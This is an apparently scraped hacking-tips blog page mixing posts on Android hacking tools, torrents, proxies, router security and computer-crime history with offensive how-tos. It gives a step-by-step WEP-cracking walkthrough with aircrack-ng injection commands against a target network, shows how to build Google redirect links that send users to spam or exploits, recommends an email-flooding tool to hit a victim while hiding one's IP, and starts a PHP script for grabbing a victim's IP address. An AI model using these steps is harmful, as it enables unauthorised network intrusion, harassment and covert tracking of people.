.

get our extension

Wednesday 28 May 2014

Android Tools For Hacking !

BY Unknown IN , No comments


Android Tools For Hacking!
Hacking requires significant in depth knowledge of everything that abounds the digital world. Tech savvy users like to play around with their smartphones. Android devices are everywhere these days. No wonder, there has been a rampant growth of various hacking tools to exploit/secure the platform. We have compiled a list of 10 awesome Android hacking tools!
1.Hackode

Hackode : The hacker's Toolbox is an application for penetration tester, Ethical hackers, IT administrator and Cyber security professional to perform different tasks like reconnaissance, scanning performing exploits etc.
2.androrat
Remote Administration Tool for Android. Androrat is a client/server application developed in Java Android for the client side and in Java/Swing for the Server.
3.APKInspector
APKinspector is a powerful GUI tool for analysts to analyse the Android applications. The goal of this project is to aide analysts and reverse engineers to visualise compiled Android packages and their corresponding DEX code.
4.DroidBox
DroidBox is developed to offer dynamic analysis of Android applications.
5.Burp Suite
Burp Suite is an integrated platform for performing security testing of web applications. Its various tools work seamlessly together to support the entire testing process, from initial mapping and analysis of an application's attack surface, through to finding and exploiting security vulnerabilities.
6.zANTI
zANTI is a comprehensive network diagnostics toolkit that enables complex audits and penetration tests at the push of a button. It provides cloud-based reporting that walks you through simple guidelines to ensure network safety.
7.Droid Sheep
DroidSheep can be easily used by anybody who has an Android device and only the provider of the webservice can protect the users. So Anybody can test the security of his account by himself and can decide whether to keep on using the webservice.
8.dSploit
dSploit is an Android network analysis and penetration suite which aims to offer to IT security experts/geeks the most complete and advanced professional toolkit to perform network security assesments on a mobile device.
9.AppUse – Android Pentest Platform Unified Standalone Environment
AppSec Labs recently developed the AppUse Virtual Machine. This system is a unique, free, platform for mobile application security testing in the android environment, and it includes unique custom-made tools created by AppSec Labs.
10.Shark for Root
Traffic sniffer, works on 3G and WiFi (works on FroYo tethered mode too). To open dump use WireShark or similar software, for preview dump on phone use Shark Reader. Based on tcpdump.

Download Torrent Via IDM !

BY Unknown IN , No comments




How to download torrents with Internet Download Manager. Torrent is tiny file with .torrent extension which allows you to download huge amount of data. We use torrents to download various stuffs like movies, games, software package and plenty of different things. you'll transfer torrents from several website. The transfer speed for torrents depends on seeds it has. It will make difficult for you to download files with very low or no seed counts. However with the assistance of this trick you'll be able to download torrent file with IDM. This tool can be really helpfull when you want to download file that has very low seeds. IDM is the quickest file transfer manager on the internet market. So lets begin!

1. First download the torrent file with .torrent extension which you wish to download from the internet directly without any torrent client like utorrent.
2. Now open zbigz.com and you will land on its homepage.
3. Then Click on upload Torrent and browse your torrent to transfer and click on Go.
4. Then it will ask you for Free or Premium service, choose Free to proceed further.
5. It will take some time to cache your file. Once the caching is done, click on transfer button to download your file
6. You should have internet download manager installed on your computer so that download start inside IDM. If you don't have IDM don't worry it will download directly.
Note: If you decide on to use Free transfer then you wont be able to transfer file of more then 1 GB.

Convert Webpage To PDF Easily Without Any Software !

BY Unknown IN , , No comments


Simple Trick To Convert A Webpage To PDF File:

1. Open the Google Chrome Browser on your PC or MAC
2. Then go to the web page that you want to convert as a PDF.
3. Now press Ctrl+P on Windows PC or Command+P if you are on a Mac to Open the the Print dialog on Chrome Browser. 
4. Now Change the destination to “Save As PDF” and hit the save button.
5. The current web page will instantly be downloaded as a PDF document.

Use Google As A Proxy !

BY Unknown IN , , No comments


How To Use Google As A Proxy ?


Method 1:

1. Visit whatismyipaddress and note down you real Ip Address
2. Now Go to Google Translate
3. From Under Detect Language, Chose your language in my case English
4. Now type http://whatismyipaddress.com/ in text area and click on Translate
5. Now check your Ip Address, Its different from the real one.

Method 2

1. Go to link given below:
http://www.google.com/translate?langpair=es|en&u=www.mybloggersworld.com
2. Change www.mybloggersworld.com to website you like to visit.
3. Done!

Redirecting Methods !

BY Unknown IN , , No comments


Do you know about new exploit in web world?

Google redirect exploit is very popular in web world. It seems like a simple link for Google page but when user click on that link they get redirected to other webpage which may contain spam or other exploits.

You can simply build your own google redirect exploit, you dont need any special tool or programming for this exploit.

Let see how we can build this exploit. We will discuss two methods, one will be simple and without using any tool and other will use a tool that will be needed in some cases.


METHOD 1:---

Step 1:--- Go to - google.com
Step 2: --- Now in search box, type-- sitein:your website link
Example-- sitein:techntips.net

Step 3:--- You will get search result, right click on any search result topic which will contain your webpage link.

Step 4:--- Now click on- Copy link location

Step 5:--- Now paste that link wherever you want, or you can go to that link you will see
that link will redirect you to your webpage.

METHOD 2:---

Step 1:--- Go to- viewmy.pm/google

Step 2:--- Now enter your url in the box and click on- Submit

Step 3:--- Now you will get a link, starting with google.com.

Step 4:--- Use that link to redirect user to your webpage.


Types Of Hackers

BY Unknown IN , , , No comments


Hackers are three types:-


1. White hat hacker

2. Gray hat hacker

3. Black hat hacker

White Hat and Grey Hat Hacker & What is the Real Difference?

What is worse, the public is not able to understand terms like grey hat, white hat, Linux OS, or cracker.
However, the truth is that the subculture of the hacker world is more complex than we think. Especially if we consider that, these are very intelligent people.

So, what is ethical hacking white hat and how does it differentiate from grey hackers? The only way to find out is to submerge ourselves in the world of hackers and understand, at least, the most basic concepts.


What Is A White Hat Hacker?


A hacker can be a wiz kid who spends too much time with computers and suddenly finds himself submerged in the world of cyber-security or criminal conspirators. On the other hand, he can be a master criminal who wants to obtain huge amounts of money for him, or even worse, dominate the world.

In the movie Matrix, the concept of hackers changed a bit. Although the agents of the Matrix considered them terrorists, the truth is that they were rebels fighting for the liberty of humanity. Things do not need to reach that extreme, though. We are not at war with intelligent ma chines so that kind of scenario is a bit dramatic.

Therefore, a hacker is an individual who is capable of modifying computer hardware, or software. They made their appearance before the advent of computers, when determined individuals were fascinated with the possibility of modifying machines. For example, entering a determine code in a telephone in order to make free international calls.


When computers appeared, this people found a new realm where they could exploit their skills. Now they were not limited to the constraints of the physical world, instead, they could travel through the virtual world of computers. Before the internet, they used Bulletin Board Systems (BBS) to communicate and exchange information. However, the real explosion occurred when the Internet appeared.

Today, anyone can become a hacker. Within that denomination, there are three types of hackers. The first one is the black hacker, also known as a cracker, someone who uses his computer knowledge in criminal activities in order to obtain personal benefits. A typical example is a person who exploits the weaknesses of the systems of a financial institution for making some money.

On the other side is the white hat hacker. Although white hat hacking can be considered similar to a black hacker, there is an important difference. A white hacker does it with no criminal intention in mind. Companies around the world, who want to test their systems, contract white hackers. They will test how secure are their systems, and point any faults that they may found. If you want to become a hacker with a white hat, Linux, a PC and an internet connection is all you need.

Grey Hat Hackers

A grey hat hacker is someone who is in between these two concepts. He may use his skills for legal or illegal acts, but not for personal gains. Grey hackers use their skills in
order to prove themselves that they can accomplish a determined feat, but never do it in order to make money out of it. The moment they cross that boundary, they become black hackers.

For example, they may hack the computer network of a public agency, let us say, NOAA. That is a federal crime.

If the authorities capture them, they will feel the long arm of justice. However, if they only get inside, and post, let us say, their handle, and get out without causing any kind of damage, then they can be considered grey hackers.

If you want to know more about hackers, then you can attend one of their annual conventions. Every year, hackers from all over the US, and from different parts of the world, reunite and meet at DEF CON. These conventions are much concurred. In the last one, 6,600 people attended it.

Every year, DEF CON is celebrated at Las Vegas, Nevada. However, hackers are not the only ones who go to this event. There are also computer journalists, computer security professionals, lawyers, and employees of the federal government. The event is composed by tracks of different kind, all of them related, in some way, to the world of hackers (computer security, worms, viruses, new technologies, coding, etc). Besides the tracks, there are contests that involve hacking computers, l ock picking and even robot related events. Ethical hacking, white hat hacking or whatever names you wish to use, at the end, it has a purpose: to protect the systems of organizations, public or private, around the world. After all, hackers can now be located anywhere, and they can be counted by the millions. Soon, concepts like white hat, linux operating system or grey hat will become common knowledge. A real proof of how much has our society been influenced by technology.

Black Hat Hackers

Black hat hackers have become the iconic image of all hackers around the world. For the majority of computer users, the word hacker has become a synonym for social misfits and criminals.
Of course, that is an injustice created by our own interpretation of the mass media, so it is important for us to learn what a hacker is and what a black hacker (or cracker) does. So, let's learn about black hat techniques and how they make our lives a little more difficult.
Black hat is used to describe a hacker (or, if you prefer, cracker) who breaks into a computer system or network with malicious intent. Unlike a white hat hacker, the black hat hacker takes advantage of the break-in, perhaps destroying files or stealing data for some future purpose. The black hat hacker may also make the exploit known to other hackers and/or the public without notifying the victim. This gives others the opportunity to exploit the vulnerability before the organization is able to secure it.


What Is Black Hat Hacking?


A black hat hacker, also known as a cracker or a dark side hacker (this last definition is a direct reference to the Star Wars movies and the dark side of the force), is someone who uses his skills with a criminal intent. Some examples are: cracking bank accounts in order to make transfernces to their own accounts, stealing information to be sold in the black market, or attacking the computer network of an organization for money.

Some famous cases of black hat hacking include Kevin Mitnick, who used his black hat hackers skills to enter the computers of organizations such as Nokia, Fujitsu, Motorola and Sun Microsystems (it must be mentioned that he is now a white hat hacker); Kevin Poulsen, who took control of all the phone lines in Los Angeles in order to win a radio contest (the prize was a Porsche 944 S2); and Vladimir Levin, which is the handle of the mastermind behind the stealing of $10'000,000 to Citigrou.

Top 25 Application Secrets in Windows XP

BY Unknown IN , No comments

Sponsor Ads: vietnamvisa-han made a real revolution in the industry.

Top 25 Application Secrets in Windows XP
There are some hidden secrets inside the application
window XP and sometimes we do not know ...
the following list is a list of confidential applications are:

To run the applications below:[/color]
Open a command prompt and Type the name of the program (example:
cleanmgr.exe)
or click Start -> Run and Type in the name of the program (example: cleanmgr.exe).

1. Disk Cleanup = cleanmgr.exe
Used to cleanup disk

2. Character Map = charmap.exe
Used to search for unusual characters

3. Dr Watson = drwtsn32.exe
Used for troubleshooting on the PC.

4. DirectX diagnosis = dxdiag.exe
Used for diagnosis audio video card

5. Private character editor = eudcedit.exe
Used to create a new character in your windows

6. IExpress Wizard = iexpress.exe
Used to create self-extracting / self-installing package. such as a Zip file

7. MICR * Synchronization Manager = mobsync.exe soft
Used to make sincronisasi.

8. Clipboard Viewer = clipbrd.exe
Used to view the content of the Windows clipboard

9. Windows Media Player 5.1 = mplay32.exe
Used to open Windows Media Player version 5.1

10. ODBC Data Source Administrator = odbcad32.exe
Used for database

11. Object Packager = packager.exe
Used to insert an object into a file.

12. System Configuration Editor = sysedit.exe
Used to change the system.ini and win.ini

13. Syskey = syskey.exe
Used to configure an account on the windows.

14. MICR * soft Telnet Client = telnet.exe
Used to connect to the Internet before there was a browser.

15. Driver Verifier Manager = verifier.exe
Used for monitoring drivers in your windows

16. Windows for Workgroups Chat = winchat.exe
Used to chat sec

17. System configuration = msconfig.exe
Used to control startup programs

18. System Monitor = perfmon.exe
Used to monitor your PC.

19. Program Manager = progman.exe
Is inherited from Windows 3.x desktop shell

20. gpedit.msc
Used to set the group policy and authorization, if you use Active Directory.

21. Remote Access phone book = rasphone.exe
It is applications like phone book

22. Registry Editor = Regedt32.exe [also regedit.exe]
Used for tweaking and editing windows registry

23. Network shared folder wizard = shrpubw.exe
Used to create a shared network folder

24. Siganture file verification tool = sigverif.exe
Used to verify signatures

25. Volume Control = sndvol32.exe
Used to display the sound control in the System Tray

Rooting Android Phones ! Advantages and Disadvantages !

BY Unknown IN , No comments


What is Rooting on Android? The Advantages and Disadvantages:
_______________________________________________________

“What is rooting? Why should I root my Android device?” These are common questions that I get asked quite often. Today’s lesson is to talk to you about both the advantages and disadvantages of rooting your Android devices. But before we get started, a word of caution: rooting or modifying your phone in any way will void your manufacturer’s warranty and possibly “brick” it. What does “bricking” your device mean you ask? Exactly what you think… It means screwing up your phone software so badly that your phone can no longer function properly and is pretty much as useless as a brick. I do not in any way recommend anyone to root their Android device. This article is simply to introduce you to the subject of rooting and present you with both the pro’s and con’s so that you can make an educated decision on your own.

What is Rooting?

“Rooting” your device means obtaining “superuser” rights and permissions to your Android’s software. With these elevated user privileges, you gain the ability to load custom software (ROM’s), install custom themes, increase performance, increase battery life, and the ability to install software that would otherwise cost extra money (ex: WiFi tethering). Rooting is essentially “hacking” your Android device. In the iPhone world, this would be the equivalent to “Jailbreaking” your phone.

Why is it called Rooting?

The term “root” comes from the Unix/Linux world and is used to describe a user who has “superuser” rights or permissions to all the files and programs in the software OS (Operating System). The root user, because they have “superuser” privileges, can essentially change or modify any of the software code on the device. You see, your phone manufacturer/carrier only gives you “guest” privileges when you purchase your device. They do this for good reason… they don’t want you getting into certain parts of the software on your phone and screwing it up beyond repair. It makes it much easier for them to manage and update the devices if they lock it all down. This way, all the users are running the same unmodified version of the phone’s software. This makes it much easier for them to support the devices. But, for the tech-savvy crowd, only having “guest” privileges on your device is pretty lame and it locks down a lot of potentially useful features.

What are the Advantages of Rooting?

Custom Software (ROM’s)

You may have heard of people loading custom “ROM’s” on their devices. A “ROM” is the software that runs your device. It is stored in the “Read Only Memory” of your device. There are many great custom ROM’s available that can make your Android device look and perform drastically different. For instance, you might be stuck with an older Android device that is stuck on an older version of the Android OS and it is not getting any of the newer updated versions of Android. With a custom ROM, you could load up the latest and greatest available Android versions and bring that antiquated device up to par with some of the newer ones. There are lots of great ROM’s available for many different phones and it is up to you to find the one that best meets your needs. The best place that I have found to find custom ROM’s for Android devices is the XDA Developers Forums. The XDA community is filled with smartphone enthusiasts and developers for the Android platform. Check them out and see if you find any ROM’s that would meet your needs.

http://forum.xda-developers.com/android/software-hacking

Custom Themes

Themes are basically the graphics that appear on your Android device. Rooting your device allows you the ability to fully customize just about every graphic on your device. You can load custom themes that totally change the look and feel of your device. Here are some examples:

http://forum.xda-developers.com/forumdisplay.php?f=527

Kernel, speed, and battery

There are many custom ROM’s and apps available for rooted devices that will allow you to drastically improve the performance (speed) and also extend battery life on your device. A lot of developers tweak the kernels (layer of code that handles communication between the hardware and software) for added performance, battery life, and more.

Kernel, speed, and battery

There are many custom ROM’s and apps available for rooted devices that will allow you to drastically improve the performance (speed) and also extend battery life on your device. A lot of developers tweak the kernels (layer of code that handles communication between the hardware and software) for added performance, battery life, and more.

Latest Versions of Android

As mentioned earlier, custom ROM’s can allow you to update to the latest version of the Android OS before they are officially released. This is a great feature for those who are tech-savvy and want to stay on top of the latest and greatest software updates before it hits the mainstream crowd. This is also useful if you have an outdated device that is no longer being updated by the manufacturer

Backing up your device

The ability to easily backup all of your Apps and Data is one feature that is sorely missed on the stock build of Android devices. But if you root your device, backing up everything on your device (both apps and data) becomes a simple task. Titanium Backup is a must have app for anyone who has rooted their devices and wants to backup and restore their phones.

https://play.google.com/store/apps/details?id=com.keramidas.TitaniumBackup

Unlocking Additional Features

By rooting your Android device you also gain the ability to unlock some features that your carrier may charge for. One example is enabling free WiFi and USB tethering, which many carriers charge money for. Now, I’m not suggesting you do this. But I did want to make you aware of the fact that it is possible to do this. However, your carrier may catch on to the fact that you are using your device as a free WiFi hotspot and figure out a way to charge you for it. So use this feature at your own risk!

What are the Disadvantages of Rooting?

Bricking

The number one reason not to root your device is the potential risk of “bricking” it. As mentioned earlier, “bricking” your device means screwing up your phone software so badly that your phone can no longer function properly and is pretty much as useless as a brick. You would likely need to purchase a new Android device since the manufacturer of your device will void the warranty after any attempts at rooting.

Security

There is an increased risk of unknowingly installing malicious software when you root an Android device. Root access circumvents the security restrictions that are put in place by the Android OS. There isn’t really an effective way to tell just what the application intends to do with that “superuser” power. You are putting a lot of trust into the developer’s hands. In most cases, these applications are open source and the community can take a look at the source code to assess the risk. But, nevertheless, the risk is there. Fortunately, malicious software on rooted devices hasn’t really been a problem as of yet. But I thought it was worth mentioning since this could be a potential risk in the future. I’d recommend installing an Anti-Virus and Security App just to be safe. Lookout Mobile Security seems to be one of the best ones available at the moment.

https://play.google.com/store/apps/details?id=com.lookout

Can I Unroot my device if I change my mind?

Yes. You would need to do some research for your specific type of device. As mentioned earlier, the XDA Developer Forums is the best place to start.

http://forum.xda-developers.com/showthread.php?t=491350

How do I learn how to root my device?

Unfortunately, there is no easy way to teach someone how to root their Android device. Each device has a unique method to rooting and some research most be done on your part. As I mentioned earlier, the best place to start would be the XDA Developer Forums. Another option is to simply Google your model phone and the term root (ex. “HTC EVO root”). Have fun and good luck to all of you! I hope you found this lesson on rooting to be helpful. If you have any questions, please feel free to leave a comment below.

http://forum.xda-developers.com/android/software-hacking
NOTE: this is only for EDUCATIONAL PURPOSE only...

Recover Memory Card Password !

BY Unknown IN , , No comments


► STEPS THAT ARE TO BE FOLLOWED IN ORDER TO RECOVER YOUR MEMORY CARD'S PASSWORD:

Step1:- Download and Install FExplorer.

Step2:- Insert card into your mobile phone but don’t access it
through phone.

Step3:- Run FExplorer and Open the path C:system . You will find a file named mmcstore, move that file to other location of your phone, rename the file mmcstore.txt .

Step4:- Open the file (mmcstore.txt) in your phone or Copy that file( mmcstore.txt ) to your pc and open that file in notepad.

Step5:- You will find your password in that file.

Wireless Home Networking Tips & Tricks :

BY Unknown IN , , No comments


Wireless Home Networking Tips & Tricks :
******************************

Fix Connectivity Issues:
""""""""""""""""""""""""""
It sounds crazy, but 95 percent of all Internet connectivity problems can be solved by power-cycling both the router and the modem. Turn them both off, and then turn the modem back on first. Once its "sync" or signal light comes on, turn on your router.

Use Encryption:
"""""""""""""""""
You've probably heard this before, but it bears repeating: Always enable your router's wireless security! Wired Equivalent Privacy (WEP) encryption is the oldest (and weakest) form of security; the newer (and stronger) Wi-Fi Protected Access (WPA) and WPA-2 are the best protection available today for home users.

Update Your Router's Firmware:
"""""""""""""""""""""""""""""""""""""
All routers include internal read-only chips with embedded instructions that can be updated by the manufacturer. Router manufacturers generally update a product's firmware to increase performance as well as to resolve bugs and security issues, so it's wise to keep your router's firmware up-to-date. Check the manufacturer's Web site for the latest updates.

Boost Your Wireless Signal:
"""""""""""""""""""""""""""""""
If walls and distance are causing wireless signal degradation, you can do a few things to boost it. Move your router to higher ground—the signal radiates downward. You can also try a signal extender (or repeater), which boosts the signal. Finally, high-gain antennas will work, but they only focus the signal in one direction.

Change Admin Password:
"""""""""""""""""""""""""""""
Every router has a well-known default password that's used to access the router's browser-based configuration page. Most setup wizards will make you change this password, but not all do. If not, be sure to change it yourself to prevent unwanted hangers-on from changing your network's settings.

Go Back to Factory Settings:
""""""""""""""""""""""""""""""""
If you've lost or forgotten your router's login credentials, you can get around this predicament by resetting the router to its factory settings. Do this by holding down the button on the back of it for 30 seconds. Next, look in the manual for the default user name and password, and then change them on your router's browser-based configuration page.

Disable SSID Broadcast:
"""""""""""""""""""""""""""
Unless you disable it, your router broadcasts its service set identifier (SSID)—the name of your network—which allows your neighbors to see (and attempt to gain access to) your network. Instead, disable broadcasting, making the network appear as "SSID not broadcast." Access the unnamed network by typing in the SSID name when prompted.

Change the Default SSID:
"""""""""""""""""""""""""""""
Change your pre-defined, default SSID—leaving it as "Linksys," for example, tells the world that you haven't configured your router, which invites attackers.

Filter by MAC Address:
""""""""""""""""""""""""""
Every piece of networking gear includes a unique "fingerprint" called a media access control, or MAC, address. You can configure your router to filter connections using these addresses so that only your computers can connect to your network. Most routers will show you connected devices, so adding an adapter's MAC address is a one-click process.

Step Up to 5GHz:
"""""""""""""""""""
The majority of today's networks operate in the crowded 2.4GHz frequency range, which is shared by microwaves, cordless phones, and other home networks. To avoid possible interference, many new routers are capable of broadcasting at 5GHz, which has 23 wide-open channels as opposed to 2.4GHz's three non-overlapping channels.

Limit Your Number of DHCP Clients:
""""""""""""""""""""""""""""""""""""""""
Most people use their router as a DHCP server; when clients connect, the router dynamically assigns IP addresses from a large pool of addresses. Limiting that list to the number of clients in your home, however, will help prevent interlopers from hopping onto your network.

Use Your Router's Firewall:
"""""""""""""""""""""""""""""""
Two features make most hardware firewalls more powerful than software firewalls: stateful packet inspection (SPI) and network address translation (NAT). SPI examines packets' content and behavior before granting access, and NAT hides all PCs connected to the router from the Internet, "translating" their IP addresses into private ones that are unreachable from outside the firewall.

Change Your Channel:
"""""""""""""""""""""""""
Wireless B and G (and some N) routers operate at the 2.4GHz frequency, which only has three non-overlapping channels: 1, 6 and 11. By default, your router will most likely be using one of these channels, and the bad news is so your neighbors' routers as well. If you experience dropped connections, sluggish performance or both, a good first step is to switch the channel. If it's set to channel 1, go to 11. If it's set to 6, try either 1 or 11 for best results.

Let Windows Control Your Wireless Networks:
""""""""""""""""""""""""""""""""""""""""""""""""""""
If a network adapter's software takes control of your wireless network, it can be difficult to put Windows back in charge. First, click Start, then Run, then type services.msc. Scroll down to Wireless Zero Configuration and start the service. Right-click your wireless connection, select view available networks, and then click advanced settings on the left. Click the wireless networks tab, and check "Use Windows to Configure my wireless network settings."

Disable File Sharing in Public:
"""""""""""""""""""""""""""""""""
If you're in a public place with a Net connection, it's a good idea to disable File and Printer Sharing for Microsoft Networks. In the properties of your network adapter, uncheck the appropriate box. It's also a good idea to switch your notebook's wireless radio off if you aren't using it.

Hack A Wireless Network/Wifi/WEP !

BY Unknown IN , , No comments

"It is so pleasant to work with experts. Read more to find out more regarding how to choose surveillance cameras."

HOW TO HACK A WIFI NETWORK =>
Courtesy : Computer Expert

So.. Here’s how we do it..

1) First we need to scan for available wireless networks.Theres this great tool for windows to do this.. called “NetStumbler” or Kismet for Windows and Linux and KisMac for Mac It’ll also show how the Wi-fi network is secured..

The two most common encryption types are:
1. WEP
2. WAP

WEP i.e Wire Equivalent Privacy is not consideres as safe as WAP
i.e Wireless Application Protocol.
WEP have many flaws that allows a hacker to crack a WEP
key easily.. whereas WAP is currently the most secure and best option to secure a wi-fi network..
It can’t be easily cracked as WEP because the only way to retreive a WAP key is to use a brute-force attack or dictionary atack.

Here I’ll tell you how to Crack WEP

To crack WEP we will be using Live Linux distribution called BackTrack to crack WEP. BackTrack have lots of preinstalled softwares for this very purpose..
The tools we will be using on
Backtrack are:
Kismet – a wireless network detector
airodump – captures packets from a wireless router
aireplay – forges ARP requests
aircrack – decrypts the WEP keys
1. First of all we have to find a wireless access point along with its bssid, essid and channel number. To do this we will run kismet by opening up the terminal and typing in kismet. It
may ask you for the appropriate adapter which in my case is ath0. You can see your device’s
name by typing in the command iwconfig.
2. To be able to do some of the later things, your wireless adapter must be put into monitor mode. Kismet automatically does this and as long as you keep it open, your wireless adapter will stay in
monitor mode.
3. In kismet you will see the flags Y/N/0. Each one stands for a different type of encryption. In
our case we will be looking for access points with the WEP encryption. Y=WEP N=OPEN
0=OTHER(usually WAP).
4. Once you find an access point, open a text document and paste in the networks broadcast
name (essid), its mac address (bssid) and its channel number.
To get the above information,
use the arrow keys to select an access point and hit <ENTER> to get more information about it.
5. The next step is to start collecting data from the access point with airodump. Open up a
new terminal and start airodump by typing in the command:
airodump-ng -c [channel#] -w
[filename] –bssid [bssid]
[device]
In the above command airodump-ng starts the program , the channel of your access point goes after -c , the file you wish to output the data goes after -w , and the MAC address of the access point goes
after –bssid. The command ends with the device name. Make sure to leave out the brackets.
6. Leave the above running and open another terminal. Next we will generate some fake packets
to the target access point so that the speed of the data output will
increase. Put in the following command:
aireplay-ng -1 0 -a [bssid] -h
00:11:22:33:44:55:66 -e [essid]
[device]
In the above command we are using the airplay-ng program. The -1 tells the program the
specific attack we wish to use which in this case is fake authentication with the access point. The 0 cites the delay between attacks, -a is the MAC address of the target access point, -h is your wireless adapters MAC address, -e is the name (essid) of the target access point, and the command ends with the your wireless adapters device name.
7. Now, we will force the target access point to send out a huge amount of packets that we will
be able to take advantage of by using them to attempt to crack the WEP key. Once the following
command is executed, check your airodump-ng terminal and you should see the ARP packet
count to start to increase. The command is:
aireplay-ng -3 -b [bssid] -h
00:11:22:33:44:5:66 [device]
In this command, the -3 tells the program the specific type of attack which in this case is
packet injection, -b is the MAC address of the target access point , -h is your wireless
adapters MAC address, and the wireless adapter device name goes at the end.
8. Once you have collected around 50k-500k packets, you may begin the attempt to break
the WEP key. The command  begin the cracking process is:
aircrack-ng -a 1 -b [bssid] -n 128
[filename].ivs
In this command the -a 1 forces the program into the WEP attack mode, the -b is the targets MAC
address, and the -n 128 tells the program the WEP key length. If you don’t know the -n , then
leave it out. This should crack the WEP key within seconds. The more packets you capture, the
bigger chance you have of cracking the WEP key.


8 Hacking Tools For A Hacker !

BY Unknown IN , , No comments


8 Top Hacking Tools For you !!!

Here are 8 top hacking tools you must try:

1. NMAP

-Holds the reputation of being the best security scanning and hacking tool ever created!

-Very easy to use.

-Provides options like port scanning, fingerprinting, OS detection, ping, scanning, alive hosts detection, etc.

-It's an amazing command line tool in the hands of advanced users, at the same time highly recommended for beginners as well.

2. SUPERSCAN

-It's a very powerful protocol port scanner, pinger and resolver.

-It's perhaps the best alternative for Nmap on Windows.

-Provides heaps of data.

3. CAIN AND ABEL

-Permits simple recovery of varied passwords by sniffing the network, cracking encrypted passwords, Brute-Force and cryptology attacks, recording VoIP conversations, revealing hidden boxes, uncovering cached passwords and analySing routing protocols!

4. JOHN THE RIPPER

-Thanks to the support of the open source community, it has evolved into a strong tool for hacking.

-Presently offered for several operating systems, its primary purpose is to observe weak operating system passwords.

5. NESSUS SECURITY SCANNER

-Enables high-speed discovery, configuration auditing, quality identification, sensitive information discovery and vulnerability analysis of your security infrastructure.

6. WIRESHARK

-It's a powerful network protocol analyser that helps you capture and browse the contents of network frames.

-Works well on both UNIX system and Windows (with a GUI).

7. LIVE BULK MAILER

-It's an email flooding tool that permits the hacker to send desired variety of bulk mails to the victim inbox.

-Don’t forget to use a proxy server to cover your IP address, before using this tool!

8. WEBSITE DIGGER

-Dig into an internet site and gain data concerning the host by applying 'who is' question and conjointly banner grabbing capability.

Top Computing Crimes !

BY Unknown IN , , , No comments

"If you are looking for a company to do crm or erp you found the right place. TWO IT Consulting is one of the best in Cape Town to work with so give us a call today or visit our offices here: Foyer 3, 1st Floor Colloseum Building, Century Way, Century City, Cape Town 7441, 082 694 0659, www.two-it.com." 

The WANK Worm (October 1989)
Possibly the first "hacktivist" (hacking activist) attack, the WANK worm hit NASA offices in Greenbelt, Maryland. WANK (Worms Against Nuclear Killers) ran a banner (pictured) across system computers as part of a protest to stop the launch of the plutonium-fueled, Jupiter-bound Galileo probe. Cleaning up after the crack has been said to have cost NASA up to a half of a million dollars in time and resources. To this day, no one is quite sure where the attack originated, though many fingers have pointed to Melbourne, Australia-based hackers.

Ministry of Defense Satellite Hacked (February 1999)
A small group of hackers traced to southern England gained control of a MoD Skynet military satellite and signaled a security intrusion characterized by officials as "information warfare," in which an enemy attacks by disrupting military communications. In the end, the hackers managed to reprogram the control system before being discovered. Though Scotland Yard's Computer Crimes Unit and the U.S. Air Force worked together to investigate the case, no arrests have been made.

CD Universe Credit Card Breach (January 2000)
A blackmail scheme gone wrong, the posting of over 300,000 credit card numbers by hacker Maxim on a Web site entitled "The Maxus Credit Card Pipeline" has remained unsolved since early 2000. Maxim stole the credit card information by breaching CDUniverse.com; he or she then demanded $100,000 from the Web site in exchange for destroying the data. While Maxim is believed to be from Eastern Europe, the case remains as of yet unsolved.

Ministry of Defense Satellite Hacked (February 1999)Military Source Code Stolen (December 2000)
If there's one thing you don't want in the wrong hands, it's the source code that can control missile-guidance systems. In winter of 2000, a hacker broke into government-contracted Exigent Software Technology and nabbed two-thirds of the code for Exigent's OS/COMET software, which is responsible for both missile and satellite guidance, from the Naval Research Lab in Washington, D.C. Officials were able to follow the trail of the intruder "Leaf" to the University of Kaiserslautern in Germany, but that's where the trail appears to end.

Anti-DRM Hack (October 2001)
In our eyes, not all hackers are bad guys (as evidenced by our list of the Ten Greatest Hacks of All Time); often they're just trying to right a wrong or make life generally easier for the tech-consuming public. Such is the case of the hacker known as Beale Screamer, whose FreeMe program allowed Windows Media users to strip digital-rights-management security from music and video files. While Microsoft tried to hunt down Beale, other anti-DRM activists heralded him as a crusader.


Dennis Kucinich on CBSNews.com (October 2003)
As Representative Kucinich's presidential campaign struggled in the fall of 2003, a hacker did what he could to give it a boost. Early one Friday morning the CBSNews.com homepage was replaced by the campaign's logo. The page then automatically redirected to a 30-minute video called "This is the Moment," in which the candidate laid out his political philosophy. The Kucinich campaign denied any involvement with the hack, and whoever was responsible was not identified.

Hacking Your MBA App (March 2006)
Waiting on a college or graduate school decision is a nail-biting experience, so when one hacker found out how to break into the automated ApplyYourself application system in 2006, it was only natural that he wanted to share the wealth. Dozens of top business schools, including Harvard and Stanford, saw applicants exploiting the hack in order to track their application statuses. The still-unknown hacker posted the ApplyYourself login process on Business Week's online forums; the information was promptly removed and those who used it were warned by schools that they should expect rejection letters in the mail.

The 26,000 Site Hack Attack (Winter 2008)
MSNBC.com was among the largest of the thousands of sites used by a group of unknown hackers earlier this year to redirect traffic to their own JavaScript code hosted by servers known for malware. The malicious code was embedded in areas of the sites where users could not see it, but where hackers could activate it.

Supermarket Security Breach (February 2008)Supermarket Security Breach (February 2008)
Overshadowed only by a T.J Maxx breach in 2005, the theft of at least 1,800 credit and debit card numbers (and the exposure of about 4.2 million others) at supermarket chains Hannaford and Sweetbay (both owned by the Belgium-based Delhaize Group) in the Northeast United States and Florida remains unsolved more than six months later. Chain reps and security experts are still unclear as to how the criminals gained access to the system; the 2005 T.J.Maxx breach took advantage of a vulnerability in the chain's wireless credit transfer system, but Hannaford and Sweetbay do not use wireless transfers of any sort. Without more information, the difficulty in tracking down those responsible grows exponentially.

Comcast.net Gets a Redirect (May 2008)Comcast.net Gets a Redirect (May 2008)
A devious hack doesn't always mean finding a back door or particularly crafty way into a secure network or server; sometimes it just means that account information was compromised. Such was the case earlier this year when a member of the hacker group Kryogeniks gained unauthorized access to Comcast.net's registrar, Network Solutions. The domain name system (DNS) hack altered Comcast.net's homepage to redirect those attempting to access webmail to the hackers' own page (pictured). Spokespeople for Comcast and Network Solutions are still unclear as to how the hackers got the username and password.

How To Grab Some One IP ?

BY Unknown IN , , , 1 comment


How To Grab Someone IP Address ? :
______________________________________________________

how to grab someone Ip address using PHP script.This method can be used to grab someone Ip address on yahoo or Facebook chat or by sending mail to victim. So Lets get started.

How To Hack Someone Ip Address ?
1. Copy the below codes into Notepad and save it as Grab.php (.php is must) 
---------------------------------------------------------------------------

<?php
$hostname = gethostbyaddr($_SERVER['REMOTE_ADDR']);
$img_number = imagecreate(400,95);
$backcolor = imagecolorallocate($img_number,10,102,153);
$textcolor = imagecolorallocate($img_number,255,255,255);

imagefill($img_number,0,0,$backcolor);
